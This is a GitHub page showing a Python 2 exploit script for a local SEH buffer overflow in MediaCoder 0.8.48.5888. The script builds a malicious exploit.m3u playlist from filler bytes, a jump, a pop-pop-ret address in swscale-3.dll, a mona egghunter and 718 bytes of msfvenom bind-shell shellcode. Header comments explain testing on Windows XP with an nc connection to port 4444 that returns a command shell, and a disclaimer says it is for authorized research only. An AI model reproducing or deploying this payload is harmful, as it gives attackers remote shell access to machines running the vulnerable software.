-
Notifications
You must be signed in to change notification settings - Fork 3
/
exploit-mediacoder.py
118 lines (111 loc) · 5.68 KB
/
exploit-mediacoder.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
#!/usr/bin/python
#
# October 2017 | github.com/rafaveira3
#
# MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH) (Using Egghunter)
#
# How I tested it:
# - Windows XP SP3 and Kali.
# - Download the vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE)
# - https://www.exploit-db.com/apps/88879396a7103d9a401d05f5cec9bcae-MediaCoder-0.8.48.5888.exe
#
# PoC:
# Windows XP:
# - Install MediaCoder 0.8.48.5888 (next -> next -> finish)
# C:\Python27>python.exe exploit-mediacoder.py
# Exploit has been created!
# C:\Python27>
# - Open cmd.exe and type : netstat -ano | find ":4444"
# - Right click exploit.m3u -> Open With... MediaCoder
# Kali:
# root@kali:~# nc -nv 10.10.0.20 4444
# (UNKNOWN) [10.10.0.20] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\MediaCoder>
#
#
# Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems.
# Accessing a computer system or network without authorization or explicit permission is illegal.
#
# Infos:
# - pattern_create + pattern_offset= = 365
# - pop pop ret found using mona at 0x64f010b2 of swscale-3.dll (SafeSEH:False)
# - short jmp 54 bytes back opcode: \xEB\xCA
# - egghunter generated with mona (egg r4f4)
# - shellcode generated with msfvenom
from struct import pack
jmp = "\xEB\xCA"
# Size 32 Bytes
# Egg = r4f4
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
# msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed
# Size = 718 bytes
shellcode = ""
shellcode += "\x89\xe7\xdb\xc9\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x38\x68\x6f"
shellcode += "\x72\x77\x70\x53\x30\x67\x70\x71\x70\x6c\x49\x39\x75"
shellcode += "\x54\x71\x4b\x70\x35\x34\x4c\x4b\x76\x30\x74\x70\x4e"
shellcode += "\x6b\x43\x62\x36\x6c\x4e\x6b\x63\x62\x62\x34\x6c\x4b"
shellcode += "\x51\x62\x57\x58\x36\x6f\x6c\x77\x32\x6a\x76\x46\x55"
shellcode += "\x61\x6b\x4f\x6c\x6c\x45\x6c\x50\x61\x53\x4c\x44\x42"
shellcode += "\x66\x4c\x45\x70\x6a\x61\x48\x4f\x34\x4d\x56\x61\x59"
shellcode += "\x57\x58\x62\x6a\x52\x42\x72\x52\x77\x4e\x6b\x46\x32"
shellcode += "\x62\x30\x6e\x6b\x32\x6a\x65\x6c\x6c\x4b\x32\x6c\x52"
shellcode += "\x31\x44\x38\x4b\x53\x70\x48\x56\x61\x48\x51\x46\x31"
shellcode += "\x4c\x4b\x56\x39\x67\x50\x37\x71\x4b\x63\x4c\x4b\x53"
shellcode += "\x79\x72\x38\x4d\x33\x34\x7a\x62\x69\x6c\x4b\x36\x54"
shellcode += "\x6e\x6b\x73\x31\x5a\x76\x55\x61\x4b\x4f\x6e\x4c\x6b"
shellcode += "\x71\x6a\x6f\x64\x4d\x47\x71\x58\x47\x45\x68\x69\x70"
shellcode += "\x51\x65\x4c\x36\x56\x63\x51\x6d\x39\x68\x57\x4b\x51"
shellcode += "\x6d\x37\x54\x74\x35\x59\x74\x31\x48\x6e\x6b\x76\x38"
shellcode += "\x67\x54\x37\x71\x4e\x33\x65\x36\x4e\x6b\x54\x4c\x52"
shellcode += "\x6b\x4e\x6b\x32\x78\x37\x6c\x45\x51\x49\x43\x6e\x6b"
shellcode += "\x54\x44\x4e\x6b\x43\x31\x58\x50\x6e\x69\x31\x54\x66"
shellcode += "\x44\x54\x64\x53\x6b\x33\x6b\x43\x51\x50\x59\x42\x7a"
shellcode += "\x33\x61\x79\x6f\x59\x70\x71\x4f\x61\x4f\x51\x4a\x4c"
shellcode += "\x4b\x42\x32\x68\x6b\x6e\x6d\x43\x6d\x55\x38\x30\x33"
shellcode += "\x30\x32\x35\x50\x73\x30\x52\x48\x70\x77\x73\x43\x36"
shellcode += "\x52\x33\x6f\x51\x44\x50\x68\x70\x4c\x34\x37\x64\x66"
shellcode += "\x36\x67\x4b\x4f\x39\x45\x4d\x68\x7a\x30\x56\x61\x63"
shellcode += "\x30\x57\x70\x56\x49\x6a\x64\x72\x74\x56\x30\x65\x38"
shellcode += "\x47\x59\x4f\x70\x70\x6b\x63\x30\x4b\x4f\x4a\x75\x73"
shellcode += "\x5a\x54\x48\x61\x49\x30\x50\x79\x72\x4b\x4d\x43\x70"
shellcode += "\x56\x30\x51\x50\x36\x30\x72\x48\x49\x7a\x34\x4f\x49"
shellcode += "\x4f\x69\x70\x49\x6f\x78\x55\x6a\x37\x75\x38\x75\x52"
shellcode += "\x37\x70\x52\x31\x73\x6c\x6d\x59\x69\x76\x71\x7a\x36"
shellcode += "\x70\x30\x56\x72\x77\x61\x78\x48\x42\x6b\x6b\x64\x77"
shellcode += "\x63\x57\x49\x6f\x69\x45\x50\x57\x70\x68\x4d\x67\x4a"
shellcode += "\x49\x54\x78\x4b\x4f\x4b\x4f\x4e\x35\x50\x57\x71\x78"
shellcode += "\x42\x54\x6a\x4c\x35\x6b\x59\x71\x39\x6f\x4b\x65\x43"
shellcode += "\x67\x6c\x57\x70\x68\x31\x65\x52\x4e\x72\x6d\x45\x31"
shellcode += "\x39\x6f\x4e\x35\x63\x58\x65\x33\x72\x4d\x32\x44\x53"
shellcode += "\x30\x6e\x69\x6a\x43\x72\x77\x61\x47\x56\x37\x34\x71"
shellcode += "\x4c\x36\x32\x4a\x52\x32\x46\x39\x70\x56\x79\x72\x69"
shellcode += "\x6d\x61\x76\x4a\x67\x53\x74\x54\x64\x37\x4c\x45\x51"
shellcode += "\x66\x61\x4c\x4d\x32\x64\x66\x44\x66\x70\x59\x56\x35"
shellcode += "\x50\x77\x34\x31\x44\x76\x30\x36\x36\x63\x66\x66\x36"
shellcode += "\x37\x36\x42\x76\x42\x6e\x56\x36\x76\x36\x51\x43\x42"
shellcode += "\x76\x52\x48\x64\x39\x48\x4c\x77\x4f\x6c\x46\x49\x6f"
shellcode += "\x78\x55\x4e\x69\x6d\x30\x70\x4e\x50\x56\x67\x36\x39"
shellcode += "\x6f\x70\x30\x62\x48\x35\x58\x4d\x57\x57\x6d\x35\x30"
shellcode += "\x69\x6f\x58\x55\x6f\x4b\x48\x70\x6d\x65\x6d\x72\x31"
shellcode += "\x46\x51\x78\x6d\x76\x4d\x45\x4f\x4d\x4d\x4d\x49\x6f"
shellcode += "\x5a\x75\x55\x6c\x67\x76\x71\x6c\x34\x4a\x4b\x30\x6b"
shellcode += "\x4b\x39\x70\x50\x75\x65\x55\x6f\x4b\x57\x37\x54\x53"
shellcode += "\x71\x62\x32\x4f\x71\x7a\x55\x50\x31\x43\x4b\x4f\x39"
shellcode += "\x45\x41\x41"
# buf = junk + nSEH + SEH + junk
junk = "http://" + "A"*309 + "\x90"*10 + egghunter + "\x90"*10 + "B"*2 + jmp + "\xb2\x10\xf0\x64" + "r4f4r4f4" + shellcode
exploit = junk
try:
file= open("exploit.m3u",'w')
file.write(exploit)
file.close()
raw_input("\nExploit has been created!\n")
except:
print "There has been an Error"